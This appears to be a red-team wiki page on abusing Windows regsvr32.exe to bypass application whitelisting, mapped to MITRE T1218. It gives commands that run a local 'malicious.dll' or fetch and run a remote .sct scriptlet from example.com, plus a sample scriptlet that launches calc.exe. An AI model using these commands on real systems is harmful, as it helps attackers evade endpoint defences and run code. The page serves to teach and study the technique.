search
Infiltr8ForumGitHub
githubEdit

RegSrv32

hashtag
Theory

Regsvr32 is a Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry. Besides its intended use, regsvr32.exe binary can also be used to execute arbitrary binaries and bypass the Windows Application Whitelisting.

Application Whitelisting is a Microsoft endpoint security feature that prevents malicious and unauthorized programs from executing in real-time. Application whitelisting is rule-based, where it specifies a list of approved applications or executable files that are allowed to be present and executed on an operating system.

hashtag
Practice

#Execute dll
c:\Windows\System32\regsvr32.exe c:\Users\pwn\Downloads\malicious.dll

#Or
c:\Windows\System32\regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\malicious.dll

With the .sct file as:

#http://example.com/file.sct
<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
    ]]>
</script>
</registration>
</scriptlet>

The MITRE ATT&CK framework refers to this technique as Signed Binary Proxy Execution (T1218)arrow-up-right

hashtag
Resources

LogoLiving Off the LandTryHackMechevron-right
Logoregsvr32 | Red Team Noteswww.ired.teamchevron-right

Last updated